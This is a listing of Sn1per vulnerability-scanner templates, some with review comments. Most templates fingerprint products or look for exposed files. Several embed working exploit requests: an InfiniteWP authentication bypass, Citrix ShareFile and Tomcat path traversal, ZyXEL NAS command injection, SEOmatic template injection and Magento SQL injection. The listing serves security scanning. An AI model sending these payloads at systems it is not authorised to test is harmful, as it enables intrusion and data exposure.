# The base64 body decodes to a JSON iwp_action=add_site request for user "admin"; an
# IWPHEADER in the reply indicates the plugin processed the unauthenticated action,
# which is state-affecting if accepted. (Filename says "IfiniteWP"; VULN_NAME has the
# correct "InfiniteWP".)
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-8772 - InfiniteWP Client 1.9.4.5 - Authentication Bypass 1'
URI='/wp-admin/'
METHOD='POST'
MATCH="IWPHEADER"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure -H 'Content-Type: application/x-www-form-urlencoded' --data '_IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQ=='"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-8982_-_Citrix_ShareFile_StorageZones_Unauthenticated_Arbitrary_File_Read.sh:
# Sn1per active-scan template files (key=value, sourced by the scanner). Inferred from
# the field names only — the runner is not in this file: one METHOD request to URI with
# CURL_OPTS; the response is grepped with GREP_OPTIONS for MATCH; a hit is reported as
# VULN_NAME at SEVERITY.
--------------------------------------------------------------------------------
# Traversal read of win.ini; MATCH is a phrase from that file's standard comment text.
# Each "\\\\" inside the double-quoted URI collapses to "\\" after shell processing.
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-8982 - Citrix ShareFile StorageZones Unauthenticated Arbitrary File Read'
URI="/XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri"
METHOD='GET'
MATCH="bit\ app\ support"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s --insecure "
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-9047_-_exacqVision_Web_Service_Remote_Code_Execution.sh:
--------------------------------------------------------------------------------
# Version fingerprint: /version.web is compared against an explicit list of affected
# builds. A hit is a version match, not an exercised vulnerability.
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-9047 - exacqVision Web Service Remote Code Execution'
URI="/version.web"
METHOD='GET'
MATCH="3\.10\.4\.72058|3\.12\.4\.76544|3\.8\.2\.67295|7\.0\.2\.81005|7\.2\.7\.86974|7\.4\.3\.89785|7\.6\.4\.94391|7\.8\.2\.97826|8\.0\.6\.105408|8\.2\.2\.107285|8\.4\.3\.111614|8\.6\.3\.116175|8\.8\.1\.118913|9\.0\.3\.124620|9\.2\.0\.127940|9\.4\.3\.137684|9\.6\.7\.145949|9\.8\.4\.149166|19\.03\.3\.152166|19\.06\.4\.157118|19\.09\.4\.0|19\.12\.2\.0|20\.03\.2\.0|20\.06\.3\.0"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-9054_-_ZyXEL_NAS_Remote_Code_Execution.sh:
--------------------------------------------------------------------------------
# Exploit-confirming: the username parameter breaks out of the login command and echoes
# an arithmetic result; the "\$" keeps the expansion for the target rather than the
# scanner's shell, and MATCH 1787569 means the injected command ran.
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-9054 - ZyXEL NAS Remote Code Execution'
URI="/cgi-bin/weblogin.cgi?username=admin';echo \$((1+1787568))"
METHOD='GET'
MATCH="1787569"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
# Sn1per active-scan template files (key=value, sourced by the scanner). Inferred from
# the field names only — the runner is not in this file: one METHOD request to URI with
# CURL_OPTS; the response is grepped with GREP_OPTIONS for MATCH; a hit is reported as
# VULN_NAME at SEVERITY.
--------------------------------------------------------------------------------
/templates/active/CVE-2020-9484_-_Apache_Tomcat_RCE_by_deserialization.sh:
--------------------------------------------------------------------------------
# Sends a traversal JSESSIONID pointing at a non-existent session file; MATCH looks for
# the deserialization classes in the resulting error page. A hit means the persistent
# session manager followed the path and leaked a stack trace — nothing is executed.
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-9484 - Apache Tomcat RCE by deserialization'
URI="/index.jsp"
METHOD='GET'
MATCH='ObjectInputStream|PersistentManagerBase'
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s --insecure -H 'Cookie: JSESSIONID=../../../../../usr/local/tomcat/groovy' "
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-9757_-_SEOmatic_3.3.0_Server-Side_Template_Injection.sh:
--------------------------------------------------------------------------------
# Exploit-confirming SSTI probe: the template expression 228*'98' evaluates to 22344,
# which cannot appear by accident, so MATCH is a clean oracle.
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-9757 - SEOmatic < 3.3.0 Server-Side Template Injection'
URI="/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}"
METHOD='GET'
MATCH="22344"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Cisco_VPN_Login_Scanner.sh:
--------------------------------------------------------------------------------
# Informational fingerprint (P5): Cisco WebVPN logon page.
AUTHOR='@xer0dayz'
VULN_NAME='Cisco VPN Login Detected'
URI='/+CSCOE+/logon.html'
METHOD='GET'
MATCH="CSCO_Format"
SEVERITY='P5 - INFO'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Cisco_VPN_Scanner.sh:
--------------------------------------------------------------------------------
# Informational fingerprint via the WebVPN JavaScript bundle (template continues on the
# next listing line).
AUTHOR='@xer0dayz'
VULN_NAME='Cisco VPN Detected'
URI='/+CSCOE+/win.js'
METHOD='GET'
MATCH="CSCO_WebVPN"
# Sn1per active-scan template files (key=value, sourced by the scanner). Inferred from
# the field names only — the runner is not in this file: one METHOD request to URI with
# CURL_OPTS; the response is grepped with GREP_OPTIONS for MATCH; a hit is reported as
# VULN_NAME at SEVERITY.
# Tail of the Cisco VPN Scanner template (header on the previous listing line).
SEVERITY='P5 - INFO'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Citrix-Access-Gateway_Detected.sh:
--------------------------------------------------------------------------------
# Informational fingerprint. This and the two Citrix_VPN_Scanner templates below all
# request /vpn/index.html with near-identical MATCH values, so one gateway yields three
# P5 findings and three requests.
AUTHOR='@xer0dayz'
VULN_NAME='Citrix-Access-Gateway Detected'
URI='/vpn/index.html'
METHOD='GET'
MATCH='Netscaler Gateway'
SEVERITY='P5 - INFO'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Citrix_VPN_Scanner.sh:
--------------------------------------------------------------------------------
# Same probe as Citrix-Access-Gateway_Detected with an escaped-space MATCH.
AUTHOR='@xer0dayz'
VULN_NAME='Citrix VPN Detected'
URI='/vpn/index.html'
METHOD='GET'
MATCH="Netscaler\ Gateway"
SEVERITY='P5 - INFO'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Citrix_VPN_Scanner_2.sh:
--------------------------------------------------------------------------------
# Same probe again, matching the bare product name (with -i this also hits on
# "Netscaler Gateway", so it subsumes the two templates above).
AUTHOR='@xer0dayz'
VULN_NAME='Citrix VPN Detected 2'
URI='/vpn/index.html'
METHOD='GET'
MATCH="NetScaler "
SEVERITY='P5 - INFO'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Clear-text_Communications_HTTP.sh:
--------------------------------------------------------------------------------
# NOTE(review): MATCH '200 OK' is the HTTP status line, but CURL_OPTS has no -I/-i, so
# only the body is grepped and this fires only when a page happens to contain the text
# (sibling header checks such as Clickjacking use -I). Whether the request travels over
# plain HTTP at all is decided by the runner's target URL, not by this template.
AUTHOR='@xer0dayz'
VULN_NAME='Clear-Text Protocol - HTTP'
URI='/'
METHOD='GET'
MATCH='200 OK'
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
# Sn1per active-scan template files (key=value, sourced by the scanner). Inferred from
# the field names only — the runner is not in this file: one METHOD request to URI with
# CURL_OPTS; the response is grepped with GREP_OPTIONS for MATCH; a hit is reported as
# VULN_NAME at SEVERITY.
--------------------------------------------------------------------------------
/templates/active/Clickjacking.sh:
--------------------------------------------------------------------------------
# Negative check (SEARCH="negative", the only template here that uses it): reports when
# the X-Frame-Options header is absent from a HEAD response. NOTE(review): a site that
# relies on Content-Security-Policy frame-ancestors instead of X-Frame-Options is a
# false positive here, and CURL_OPTS lacks --insecure, so an HTTPS target with an
# untrusted certificate returns nothing — which a negative match may also report as a
# finding, depending on the runner.
AUTHOR='@xer0dayz'
VULN_NAME='Clickjacking'
URI='/'
METHOD='GET'
MATCH='X-Frame-Options'
SEVERITY='P4 - LOW'
CURL_OPTS="--user-agent '' -s -I"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
SEARCH="negative"
--------------------------------------------------------------------------------
/templates/active/Common_Status_File_Scanner_1.sh:
--------------------------------------------------------------------------------
# Exposed status pages (/.perf here; /server-status and /status.html below share the
# same MATCH list of status-page phrases).
AUTHOR='@xer0dayz'
VULN_NAME='Common Status File Detected 1'
URI='/.perf'
METHOD='GET'
MATCH="Current\ Time|nginx\ vhost\ traffic|ConnectionQueue"
SEVERITY='P4 - LOW'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Common_Status_File_Scanner_2.sh:
--------------------------------------------------------------------------------
# Same check for /server-status.
AUTHOR='@xer0dayz'
VULN_NAME='Common Status File Detected 2'
URI='/server-status'
METHOD='GET'
MATCH="Current\ Time|nginx\ vhost\ traffic|ConnectionQueue"
SEVERITY='P4 - LOW'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Common_Status_File_Scanner_3.sh:
--------------------------------------------------------------------------------
# Same check for /status.html.
AUTHOR='@xer0dayz'
VULN_NAME='Common Status File Detected 3'
URI='/status.html'
METHOD='GET'
MATCH="Current\ Time|nginx\ vhost\ traffic|ConnectionQueue"
SEVERITY='P4 - LOW'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
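# Sn1per active-scan template files (key=value, sourced by the scanner). Inferred from
# the field names only — the runner is not in this file: one METHOD request to URI with
# CURL_OPTS; the response is grepped with GREP_OPTIONS for MATCH; a hit is reported as
# VULN_NAME at SEVERITY.
--------------------------------------------------------------------------------
/templates/active/Confluence_Scanner.sh:
--------------------------------------------------------------------------------
# Informational fingerprint (P5): Confluence branding on the landing page.
AUTHOR='@xer0dayz'
VULN_NAME='Atlassian Confluence Detected'
URI='/'
METHOD='GET'
MATCH="Atlassian\ Confluence"
SEVERITY='P5 - INFO'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Contact_Form_7_Wordpress_Plugin_Found_1.sh:
--------------------------------------------------------------------------------
# Plugin presence via its readme (body fetched, no -I). The path is the drag-and-drop
# upload add-on, not the core Contact Form 7 plugin, despite VULN_NAME.
AUTHOR='@xer0dayz'
VULN_NAME='Contact Form 7 Wordpress Plugin Found 1'
URI="/wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/readme.txt"
METHOD='GET'
MATCH="Contact\ Form\ 7"
SEVERITY='P5 - INFO'
CURL_OPTS="--user-agent '' -s --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Contact_Form_7_Wordpress_Plugin_Found_2.sh:
--------------------------------------------------------------------------------
# Same readme check for a site installed under /wordpress/.
AUTHOR='@xer0dayz'
VULN_NAME='Contact Form 7 Wordpress Plugin Found 2'
URI="/wordpress/wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/readme.txt"
METHOD='GET'
MATCH="Contact\ Form\ 7"
SEVERITY='P5 - INFO'
CURL_OPTS="--user-agent '' -s --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Directory_Listing_Enabled.sh:
--------------------------------------------------------------------------------
# Index page titles from Apache/nginx ("Index of") and IIS ("To Parent Directory").
AUTHOR='@xer0dayz'
VULN_NAME='Directory Listing Enabled'
URI='/'
METHOD='GET'
MATCH="Index\ of|To\ Parent\ Directory"
SEVERITY='P4 - LOW'
# Re-joined: the listing had wrapped this literal across a line break.
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Drupal_Install_Found.sh:
--------------------------------------------------------------------------------
# NOTE(review): if the runner's grep treats "|" as alternation (the other templates
# rely on it), MATCH splits into "Choose language " and " Drupal", and the second
# alternative hits any page that mentions Drupal — a P3 on every Drupal site. An
# escaped "\|" or a single phrase would be more specific.
AUTHOR='@xer0dayz'
VULN_NAME='Drupal Install Found'
URI='/install.php?profile=default'
METHOD='GET'
MATCH='Choose language | Drupal'
SEVERITY='P3 - MEDIUM'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Drupal_Scanner_1.sh:
--------------------------------------------------------------------------------
# Informational fingerprint: drupal.org reference on the landing page.
AUTHOR='@xer0dayz'
VULN_NAME='Drupal Detected 1'
URI='/'
METHOD='GET'
MATCH="drupal\.org"
SEVERITY='P5 - INFO'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Drupal_Scanner_2.sh:
--------------------------------------------------------------------------------
# Same fingerprint under /drupal/. NOTE(review): VULN_NAME says "Detected 3" here and
# "Detected 2" in Drupal_Scanner_3 — the labels are swapped relative to the filenames,
# which is confusing when tracing a report entry back to its template.
AUTHOR='@xer0dayz'
VULN_NAME='Drupal Detected 3'
URI='/drupal/'
METHOD='GET'
MATCH="drupal\.org"
SEVERITY='P5 - INFO'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Drupal_Scanner_3.sh:
--------------------------------------------------------------------------------
# Same fingerprint under /blog/ (label swap noted on Drupal_Scanner_2 above).
AUTHOR='@xer0dayz'
VULN_NAME='Drupal Detected 2'
URI='/blog/'
METHOD='GET'
MATCH="drupal\.org"
SEVERITY='P5 - INFO'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Drupal_User_Login.sh: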
-------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Drupal User Login' 3 | URI='/user/login?destination=/' 4 | METHOD='GET' 5 | MATCH='user-login-form' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Drupal_Version_Disclosure.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Drupal Version Disclosure' 3 | URI='/core/install.php?profile=default' 4 | METHOD='GET' 5 | MATCH='site-version' 6 | SEVERITY='P4 - LOW' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/F5_BIG-IP_Scanner.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='F5 BIG-IP Detected' 3 | URI='/' 4 | METHOD='GET' 5 | MATCH='F5 BIG-IP' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/F5_BIG-IP_Scanner_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='F5 BIG-IP Detected 2' 3 | URI='/tmui/login.jsp' 4 | METHOD='GET' 5 | MATCH='F5 BIG-IP' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Fortigate_Pulse_Connect_Secure_Scanner.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Fortigate Pulse Connect Secure 
Detected' 3 | URI='/remote/login?lang=en' 4 | METHOD='GET' 5 | MATCH='<title>Please Login' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Fortinet_FortiGate_SSL_VPN_Panel_Detected.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Fortinet FortiGate SSL VPN Panel Detected' 3 | URI='/remote/login?lang=en' 4 | METHOD='GET' 5 | MATCH="launchFortiClient" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Fortinet_FortiGate_SSL_VPN_Panel_Detected_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Fortinet FortiGate SSL VPN Panel Detected 1' 3 | URI='/remote/login?lang=en' 4 | METHOD='GET' 5 | MATCH="launchFortiClient" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Fortinet_FortiGate_SSL_VPN_Panel_Detected_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Fortinet FortiGate SSL VPN Panel Detected 2' 3 | URI=':10443/remote/login?lang=en' 4 | METHOD='GET' 5 | MATCH="launchFortiClient" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Fortinet_FortiGate_SSL_VPN_Panel_Detected_3.sh: -------------------------------------------------------------------------------- 1 | 
AUTHOR='@xer0dayz' 2 | VULN_NAME='Fortinet FortiGate SSL VPN Panel Detected 3' 3 | URI=':4443/remote/login?lang=en' 4 | METHOD='GET' 5 | MATCH="launchFortiClient" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Frontpage_Service_Password_Disclosure.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Frontpage Service Password Disclosure' 3 | URI='/_vti_pvt/service.pwd' 4 | METHOD='GET' 5 | MATCH=' Frontpage' 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Git_Config_Detected.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Git Config Detected 1' 3 | URI='/.git/config' 4 | METHOD='GET' 5 | MATCH="\[core\]" 6 | SEVERITY='P3 - MEDIUM' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/JK_Status_Manager.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='JK Status Manager' 3 | URI='/jkstatus/' 4 | METHOD='GET' 5 | MATCH="JK\ Status\ Manager" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Jaspersoft_Detected.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Jaspersoft Detected' 3 | URI='/jasperserver/login.html?error=1' 4 | 
METHOD='GET' 5 | MATCH="Jaspersoft" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Jenkins_Scanner.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Jenkins Detected' 3 | URI='/login?from=%2F' 4 | METHOD='GET' 5 | MATCH="\[Jenkins\]" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Jetty_Version_Disclosure.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Jetty Version Disclosure Detected' 3 | URI='/' 4 | METHOD='GET' 5 | MATCH='Powered by Jetty' 6 | SEVERITY='P4 - LOW' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Jira_Scanner_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Jira Detected 1' 3 | URI='/secure/Dashboard.jspa' 4 | METHOD='GET' 5 | MATCH='Project Management Software' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Jira_Scanner_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Jira Detected 2' 3 | URI='/jira/secure/Dashboard.jspa' 4 | METHOD='GET' 5 | MATCH='Project Management Software' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | 
GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Jira_Scanner_3.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Jira Detected' 3 | URI='/secure/ContactAdministrators!default.jspa' 4 | METHOD='GET' 5 | MATCH='Project Management Software' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Jolokia_Version_Disclosure.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Jolokia Version Disclosure' 3 | URI='/jolokia/version' 4 | METHOD='GET' 5 | MATCH="\"agent\"\:" 6 | SEVERITY='P4 - LOW' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Joomla_Scanner_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Joomla Detected 1' 3 | URI='/' 4 | METHOD='GET' 5 | MATCH='content="Joomla! ' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Joomla_Scanner_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Joomla Detected 1' 3 | URI='/joomla/' 4 | METHOD='GET' 5 | MATCH='content="Joomla! 
' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Joomla_Version_Disclosure.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Joomla Version Disclosure' 3 | URI='/administrator/manifests/files/joomla.xml' 4 | METHOD='GET' 5 | MATCH="Joomla\ version\ " 6 | SEVERITY='P4 - LOW' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Laraval_Environment_File_Found.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Laraval Environment File Found' 3 | URI='/.env' 4 | METHOD='GET' 5 | MATCH="DB_PASSWORD|REDIS_PASSWORD|MAIL_PASSWORD|AWS_SECRET|PUSHER_APP_|MIX_PUSHER_APP_" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/MS_SQL_Reporting_Server_Scanner_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='MS SQL Reporting Server Detected 1' 3 | URI='/ReportServer/pages/ReportViewer.aspx' 4 | METHOD='GET' 5 | MATCH='Microsoft\.Reporting' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/MS_SQL_Reporting_Server_Scanner_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='MS SQL Reporting Server Detected 2' 3 | URI='/Reports/Pages/Folder.aspx' 4 | 
METHOD='GET' 5 | MATCH='Microsoft\.Reporting' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Magento_2.3.0_SQL_Injection.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Magento 2.3.0 SQL Injection' 3 | URI="/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%20OR%20(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=0)%20--%20-" 4 | METHOD='GET' 5 | MATCH="\[\]" 6 | SEVERITY='P1 - Critical' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Mailman_Version_Disclosure.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Mailman Version Disclosure' 3 | URI='/mailman/listinfo' 4 | METHOD='GET' 5 | MATCH="Delivered\ by\ Mailman" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='' 10 | -------------------------------------------------------------------------------- /templates/active/MobileIron_Login_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='MobileIron Login 1' 3 | URI='/mifs/user/login.jsp' 4 | METHOD='GET' 5 | MATCH="MobileIron" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/MobileIron_Login_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 
